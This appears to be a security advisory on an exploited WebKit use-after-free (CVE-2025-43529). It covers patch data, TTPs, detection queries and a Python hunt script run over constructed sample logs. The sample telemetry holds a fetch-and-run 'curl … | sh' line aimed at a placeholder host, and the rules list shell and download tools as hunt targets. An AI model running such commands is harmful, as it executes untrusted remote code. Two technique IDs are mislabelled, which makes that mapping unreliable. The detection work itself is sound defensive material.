Apple's WebKit CVE-2025-43529 actively exploited in targeted attacks
Targeted Sectors
· Apple Users
Other potential targets
· Government facilities
· Associated critical infrastructure
Potential Affected Countries
· Global
BLUF
A use-after-free vulnerability exists in the WebKit component of multiple Apple products, which allows an attacker to execute arbitrary code by tricking a user into processing maliciously crafted web content. The flaw is actively exploited as a zero-day and requires immediate patching.
Date of first reported activity
· December 12, 2025
Date of last reported activity update
· December 15, 2025
CVE-2025-43529
A use-after-free vulnerability in WebKit
CVSS:3.1
(9.8) AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Nessus ID(s)
· 278573
· 278572
· 278570
Is this on the KEV list?
Yes
CISA patch by date
January 5, 2026
Patching/Mitigation Data
Patch Release Date
December 12, 2025
URL to patch
· hxxps://support.apple.com/en-us/125884
Impacted versions
· iOS and iPadOS 26.2, iOS and iPadOS 18.7.3
· macOS Tahoe 26.2, Safari 26.2
· tvOS 26.2, watchOS 26.2, and visionOS 26.2
APT Names
· No APT groups have been named at this time
Associated Criminal Organization Names
· No specific criminal organizations have been named at this time
Delivery Method
· Exploitation occurs when a victim processes maliciously crafted web content, typically by visiting a malicious website.
IOCs
· Abnormal network traffic originating from browser processes (Safari, Chrome).
· Unusual process creation events, such as a web browser spawning unexpected child processes.
· Anomalous network connections to unknown or suspicious domains/IP addresses.
Tools
· Possibly commercial spyware tooling, but no specific tools have been reported at this time
TTPs
· T1189 - Drive-by Compromise
· T1204.001 - User Execution: Malicious Link
· T1071.001 - Application Layer Protocol: Web Protocols
· T1070.004 - File and Directory Discovery/Modification
· T1059.004 - Command and Scripting Interpreter: JavaScript/Jscript
· TA0004 - Privilege Escalation
· T1105 - Ingress Tool Transfer
· TA0011 - Command and Control
Malware names
· No malware has been named at this time
Malware Sample
· No malware has been named at this time
Email Samples
Nessus ID/Potential Suricata/SentinelOne/Splunk rules: Specific vendor IDs or rules were not specified in the search results.
Suggested Rules / potential hunts
These are indicator rules and hunt suggestions. They are likely to be noisy; for best results, consider using a data model to baseline historical behavior and surface anomalies against it.
Suricata
Anomalous HTTP Traffic Headers: Look for unusual or malformed HTTP headers that might be part of an exploit delivery mechanism, though this requires high-fidelity packet analysis.
Monitor for C2/Spyware Activity: Generic detection for known spyware C2 frameworks, as this vulnerability is linked to commercial spyware vendors.
Example (conceptual; the content match is a placeholder that must be replaced with a signature from a threat feed, and the rule is syntactically complete only once that is done):
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Suspected Commercial Spyware C2 Traffic"; flow:established,to_server; content:"SPECIFIC_SPYWARE_INDICATOR_PLACEHOLDER"; classtype:trojan-activity; sid:9999999; rev:1;)
SentinelOne
Suspicious Child Process Creation from a Browser: Hunt for instances where a web browser process
EventType = "Process Creation" AND (ParentProcessName Contains "Safari" OR ParentProcessName Contains "WebKit" OR ParentProcessName Contains "Chrome") AND ProcessName In ("sh", "bash", "zsh", "python", "perl", "curl", "wget")
Unusual Outbound Network Connection after Web Access
ProcessName Contains "WebKit" AND RemoteAddress NOT In ("*apple.com*", "*google.com*", "*your_internal_domains*") AND RemotePort NOT In (80, 443)
Memory Corruption Indicators (Advanced): While difficult to write generic rules for, monitoring for process crashes or restarts of browser components in system logs can sometimes indicate a failed or successful memory manipulation attempt.
Splunk
Browser Spawning Shell Process
index=your_edr_index OR index=your_sysmon_index ParentProcessName IN ("*Safari*", "*WebKit*", "*Chrome*", "*Firefox*") ProcessName IN ("sh", "bash", "zsh", "python", "perl", "cmd.exe", "powershell.exe") | table _time, host, ParentProcessName, ProcessName, CommandLine
Browser Crash or Fault Indicators in System Logs (the memory corruption indicator described above)
index=your_system_logs (source=*crash.log OR source=*error.log) ("WebKit" OR "Safari" OR "Chrome") ("fault" OR "exception" OR "crash")
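The three hunts above (browser spawning an interpreter, a WebKit process connecting to a non-allow-listed host on a non-web port, and browser fault lines in system logs) re-implemented as plain Python so they can be checked offline against constructed telemetry. This is an added example, not code from the advisory or from any vendor; the event field names, the sample events, the log lines and the allow-listed domains are all assumptions made up for the illustration, and the domain allow-list stands in for the wildcard list used in the SentinelOne query.

```python
"""Offline re-implementation of the SentinelOne/Splunk hunts above.

Assumptions (not from the advisory): the event schema, the allow-listed
domain suffixes and every sample record below are constructed for this example.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Parent-process fragments treated as "a browser", mirroring the rules above.
BROWSER_PARENTS = ("Safari", "WebKit", "Chrome", "Firefox")
# Interpreters and downloaders a browser should not be launching directly.
SHELL_CHILDREN = {"sh", "bash", "zsh", "python", "perl", "curl", "wget"}
# Constructed allow-list; replace with the domains your WebKit processes legitimately reach.
ALLOWED_DOMAIN_SUFFIXES = ("apple.com", "google.com", "corp.example")
WEB_PORTS = {80, 443}
CRASH_COMPONENTS = ("webkit", "safari", "chrome")
CRASH_KEYWORDS = ("fault", "exception", "crash")


@dataclass
class ProcessEvent:
    time: str
    host: str
    parent: str        # assumed field: parent process path or bundle id
    process: str       # assumed field: child process path
    command_line: str


@dataclass
class NetworkEvent:
    time: str
    host: str
    process: str
    remote_address: str  # hostname or IP as the sensor logged it (assumed field)
    remote_port: int


def _is_browser(name: str) -> bool:
    return any(fragment in name for fragment in BROWSER_PARENTS)


def browser_spawning_shell(events: Iterable[ProcessEvent]) -> List[ProcessEvent]:
    """Browser parent AND shell/interpreter child; both conditions must hold,
    which is why the parent test is parenthesised in the query above."""
    return [e for e in events
            if _is_browser(e.parent) and e.process.rsplit("/", 1)[-1] in SHELL_CHILDREN]


def _allowlisted(address: str) -> bool:
    host = address.lower()
    return any(host == s or host.endswith("." + s) for s in ALLOWED_DOMAIN_SUFFIXES)


def unusual_webkit_outbound(events: Iterable[NetworkEvent]) -> List[NetworkEvent]:
    """WebKit process reaching a non-allow-listed host on a non-web port."""
    return [e for e in events
            if "WebKit" in e.process
            and not _allowlisted(e.remote_address)
            and e.remote_port not in WEB_PORTS]


def browser_crash_lines(lines: Iterable[str]) -> List[str]:
    """Log lines that name a browser component AND a fault keyword (the Splunk search)."""
    hits = []
    for line in lines:
        low = line.lower()
        if any(c in low for c in CRASH_COMPONENTS) and any(k in low for k in CRASH_KEYWORDS):
            hits.append(line)
    return hits


# Constructed sample telemetry; none of it comes from a real incident.
SAMPLE_PROCESSES = [
    ProcessEvent("2025-12-13T09:01:02Z", "mac-01", "/Applications/Safari.app/Contents/MacOS/Safari",
                 "/bin/zsh", "zsh -c 'curl -s hxxp://example.invalid/update | sh'"),
    ProcessEvent("2025-12-13T09:01:05Z", "mac-01", "com.apple.WebKit.WebContent",
                 "/usr/bin/curl", "curl -s hxxp://example.invalid/update"),
    ProcessEvent("2025-12-13T09:02:00Z", "mac-02", "/usr/bin/login", "/bin/zsh", "-zsh"),
    ProcessEvent("2025-12-13T09:02:30Z", "mac-02", "com.apple.Safari", "/usr/libexec/trustd", "trustd"),
]
SAMPLE_CONNECTIONS = [
    NetworkEvent("2025-12-13T09:01:06Z", "mac-01", "com.apple.WebKit.Networking", "cdn.apple.com", 443),
    NetworkEvent("2025-12-13T09:01:07Z", "mac-01", "com.apple.WebKit.Networking", "203.0.113.10", 8443),
    NetworkEvent("2025-12-13T09:01:08Z", "mac-01", "com.apple.WebKit.Networking", "example.invalid", 443),
    NetworkEvent("2025-12-13T09:01:09Z", "mac-02", "com.apple.mDNSResponder", "203.0.113.10", 5353),
]
SAMPLE_LOG_LINES = [
    "2025-12-13 09:00:59 mac-01 ReportCrash[512]: Saved crash report for com.apple.WebKit.WebContent",
    "2025-12-13 09:00:59 mac-01 kernel: Safari[400] exception EXC_BAD_ACCESS",
    "2025-12-13 09:01:10 mac-02 loginwindow: session started",
    "2025-12-13 09:01:11 mac-02 Chrome Helper: renderer ok",
]


def run_hunts() -> Dict[str, list]:
    """Run all three hunts over the constructed samples and return the hits by hunt name."""
    return {
        "browser_spawning_shell": browser_spawning_shell(SAMPLE_PROCESSES),
        "unusual_webkit_outbound": unusual_webkit_outbound(SAMPLE_CONNECTIONS),
        "browser_crash_lines": browser_crash_lines(SAMPLE_LOG_LINES),
    }


if __name__ == "__main__":
    for name, results in run_hunts().items():
        print(f"{name}: {len(results)} hit(s)")
        for r in results:
            print("  ", r)
```

Against the sample data the first hunt fires on the two mac-01 process events (Safari launching zsh, WebContent launching curl) and ignores the login shell and the trustd helper; the second fires only on the 203.0.113.10:8443 connection, since the apple.com host is allow-listed and the other unknown host uses port 443; the third returns the two crash-report lines. The same precedence point applies to the SPL: Splunk evaluates OR before the implicit AND, so the grouped form and the ungrouped form of the crash search match the same events, but the parentheses make that intent explicit.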
References
Tenable
hxxps://www.tenable.com/cve/CVE-2025-43529/plugins
Support Apple
hxxps://support.apple.com/en-us/125884
CISA
hxxps://www.cisa.gov/known-exploited-vulnerabilities-catalog#:~:text=CVE-2025-43529
Security Week
hxxps://www.securityweek.com/apple-patches-two-zero-days-tied-to-mysterious-exploited-chrome-flaw
Dark Reading
hxxps://www.darkreading.com/vulnerabilities-threats/apple-patches-more-zero-days-sophisticated-attack